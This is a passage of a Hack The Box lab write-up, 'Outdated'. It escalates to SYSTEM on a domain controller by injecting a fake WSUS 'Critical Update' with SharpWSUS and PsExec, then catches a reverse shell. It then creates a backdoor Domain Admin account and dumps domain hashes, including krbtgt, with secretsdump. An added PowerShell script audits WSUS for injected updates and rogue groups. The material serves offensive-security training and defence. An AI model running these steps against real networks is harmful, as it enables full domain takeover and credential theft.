Windows Server Update Services (WSUS)
The presence of Windows Server Update Services (WSUS) was initially suspected due to the dedicated shares exposed on the SMB server, and further evidence was surfaced on the client.outdated.htb host by PEAS and BloodHound. It was later confirmed that the WSUS service is indeed running on the DC host, dc.outdated.htb.
According to the official Microsoft documentation,
Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. You can use WSUS to fully manage the distribution of updates that are released through Microsoft Update to computers on your network. This article provides an overview of this server role and more information about how to deploy and maintain WSUS.
Thus, the WSUS Administrators group is indeed a privileged group that can be abused for privilege escalation.
SharpWSUS
While there are many tools available online, SharpWSUS appears to be the most well constructed. A pre-compiled binary isn't available, so it has to be built first.
Prep
Compiling
*Evil-WinRM* PS C:\Users\sflowers\Documents> upload WSUS/SharpWSUS/SharpWSUS/bin/Release/SharpWSUS.exe .
info: Uploading /home/kali/archive/htb/labs/outdated/WSUS/SharpWSUS/SharpWSUS/bin/Release/SharpWSUS.exe to C:\Users\sflowers\Documents\.
data: 65536 bytes of 65536 bytes copied
info: Upload successful!
*Evil-WinRM* PS C:\Users\sflowers\Documents> upload WSUS/pe.exe .
info: Uploading /home/kali/archive/htb/labs/outdated/WSUS/pe.exe to C:\Users\sflowers\Documents\.
data: 9556 bytes of 9556 bytes copied
info: Upload successful!
Uploading the compiled tool as well as the payload.
It's important to note that the binary the update invokes must be a Windows-signed executable; the actual payload is handed to it as an argument.
*Evil-WinRM* PS C:\Users\sflowers\Documents> tree /F /A C:\Users\sflowers
Folder PATH listing
Volume serial number is 2170-25D8
c:\USERS\SFLOWERS
+---Desktop
| PsExec64.exe
| user.txt
|
+---Documents
| SharpWSUS.exe
| winPEASx64.exe
|
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
+---Saved Games
\---Videos
Conveniently, there is a copy of Sysinternals PsExec64.exe available in the home directory of the sflowers user. I will leverage that.
Exploitation
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe locate
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Locate WSUS Server
WSUS Server: http://wsus.outdated.htb:8530
[*] Locate complete
The WSUS server is located at http://wsus.outdated.htb:8530. wsus.outdated.htb is another alias for dc.outdated.htb, so the web server on port 8530 that was seen in the beginning was the WSUS server.
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe inspect
[*] Action: Inspect WSUS Server
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.outdated.htb, 172.16.20.1, 10.0.17763.1432, 1/6/2024 5:25:16 AM
####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------
####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers
[*] Inspect complete
The inspect command provides an overview of the target's WSUS service. The WSUS server is the DC host, which is also the sole registered client.
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:" -accepteula -s C:\Users\sflowers\Documents\pe.exe" /title:"Critical Update"
[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: PsExec64.exe
[*] Payload Path: C:\Users\sflowers\Desktop\PsExec64.exe
[*] Arguments: -accepteula -s C:\Users\sflowers\Documents\pe.exe
[*] Arguments (HTML Encoded): -accepteula -s C:\Users\sflowers\Documents\pe.exe
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
ImportUpdate
Update Revision ID: 38
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 39
PrepareXMLBundletoClient
DeploymentRevision
[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:80e97571-ac3c-4782-9c09-da1bf1543f5e /computername:Target.FQDN /groupname:"Group Name"
[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:80e97571-ac3c-4782-9c09-da1bf1543f5e /computername:Target.FQDN
[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:80e97571-ac3c-4782-9c09-da1bf1543f5e /computername:Target.FQDN /groupname:"Group Name"
[*] Create complete
Creating a “critical update” that will invoke the existing PsExec64.exe to call the payload. Now, this must be approved by a WSUS Administrator.
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe approve /updateid:80e97571-ac3c-4782-9c09-da1bf1543f5e /computername:dc.outdated.htb
[*] Action: Approve Update
Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: InjectGroup
Added Computer To Group
Approved Update
[*] Approve complete
Approved. Since no group name was given, the approve step created a new target group, InjectGroup, added dc.outdated.htb to it and approved the update for that group.
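From the defender's side, the steps above leave artifacts that the WSUS API itself exposes: an update that did not come from Microsoft Update, a fresh approval, and a new target group. The following audit script is added here as an example and is not part of the original writeup or of SharpWSUS; it assumes it runs on the WSUS server with the UpdateServices PowerShell module available, and it assumes (the page does not confirm this) that an injected update reports UpdateSource as Other rather than MicrosoftUpdate.

```powershell
# Added defensive audit example; not from the original writeup or from SharpWSUS.
# Assumes: run on the WSUS server, UpdateServices module installed, and that an
# injected update shows UpdateSource 'Other' (assumption, not confirmed by the page).
Import-Module UpdateServices -ErrorAction Stop

$wsus = Get-WsusServer   # local instance; use -Name/-PortNumber for a remote server

# 1. Who can approve updates? Membership of the local "WSUS Administrators" group.
Write-Host "== WSUS Administrators members =="
Get-LocalGroupMember -Group 'WSUS Administrators' -ErrorAction SilentlyContinue |
    Select-Object Name, ObjectClass, PrincipalSource

# 2. Updates that were not synced from Microsoft Update, with their approvals
#    and the files they would hand to the client (e.g. a signed PsExec64.exe).
Write-Host "`n== Updates not sourced from Microsoft Update =="
$nonMs = $wsus.GetUpdates() | Where-Object { $_.UpdateSource -ne 'MicrosoftUpdate' }
foreach ($u in $nonMs) {
    $approvals = $u.GetUpdateApprovals() | ForEach-Object {
        '{0} -> {1}' -f $_.Action, $_.GetComputerTargetGroup().Name
    }
    $files = $u.GetInstallableItems() | ForEach-Object { $_.Files } |
             ForEach-Object { $_.Name }
    [pscustomobject]@{
        UpdateId  = $u.Id.UpdateId
        Revision  = $u.Id.RevisionNumber
        Title     = $u.Title
        Created   = $u.CreationDate
        Approved  = $u.IsApproved
        Approvals = ($approvals -join '; ')
        Files     = ($files -join ', ')
    }
}

# 3. Target groups: anything beyond the three built-ins listed by the inspect
#    output (All Computers, Unassigned Computers, Downstream Servers) deserves a look.
Write-Host "`n== Computer target groups =="
$builtin = 'All Computers', 'Unassigned Computers', 'Downstream Servers'
$wsus.GetComputerTargetGroups() |
    Select-Object Name,
        @{ n = 'BuiltIn'; e = { $_.Name -in $builtin } },
        @{ n = 'Members'; e = { ($_.GetComputerTargets() |
                                 ForEach-Object FullDomainName) -join ', ' } }
```

Run this on a schedule and alert on any row in section 2, on any group in section 3 with BuiltIn set to False, and on changes to the membership list in section 1.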
┌──(kali㉿kali)-[~/…/htb/labs/outdated/WSUS]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.11.175] 49635
Microsoft Windows [Version 10.0.17763.1432]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Windows\system32> hostname
hostname
DC
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 3:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::1ef
IPv6 Address. . . . . . . . . . . : dead:beef::554e:a6a1:8f40:d164
Link-local IPv6 Address . . . . . : fe80::554e:a6a1:8f40:d164%15
IPv4 Address. . . . . . . . . . . : 10.10.11.175
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
10.10.10.2
Ethernet adapter vEthernet (vSwitch):
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.20.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 0.0.0.0
System Level Compromise
Hashdump
c:\Windows\system32> net user adm1n Qwer1234 /ADD /DOMAIN
net user adm1n Qwer1234 /ADD /DOMAIN
The command completed successfully.
c:\Windows\system32> net group "Domain Admins" /ADD adm1n /DOMAIN
net group "Domain Admins" /ADD adm1n /DOMAIN
The command completed successfully.
Creating an arbitrary DA account
┌──(kali㉿kali)-[~/…/htb/labs/outdated/WSUS]
└─$ impacket-secretsdump outdated.htb/adm1n:Qwer1234@dc.outdated.htb -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] target system bootkey: 0xc461277899780d4dcc67e71dd6779759
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:8aa878df2fd7dfbe60da36207785c9dc:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
outdated\dc$:aad3b435b51404eeaad3b435b51404ee:bb723f16c602237297e5c91d7968cf35:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xca4e3313b093134dce1688a3152150328a682735
dpapi_userkey:0x32e6a5cae3002840c8d498d65f45e927094da5ca
[*] NL$KM
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
administrator:500:aad3b435b51404eeaad3b435b51404ee:716f1ce2e2cf38ee1210cce35eb78cb6:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a300e4031093085c7af7ac61a79e6d00:::
outdated.htb\btables:1106:aad3b435b51404eeaad3b435b51404ee:781444163f086fdf8de13de9110ed6e7:::
outdated.htb\sflowers:1108:aad3b435b51404eeaad3b435b51404ee:1fcdb1f6015dcb318cc77bb2bda14db5:::
adm1n:20603:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
dc$:1002:aad3b435b51404eeaad3b435b51404ee:bb723f16c602237297e5c91d7968cf35:::
client$:1105:aad3b435b51404eeaad3b435b51404ee:d805ad109346699956d56bf7ff7aad7a:::
[*] Kerberos keys grabbed
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Domain Level Compromise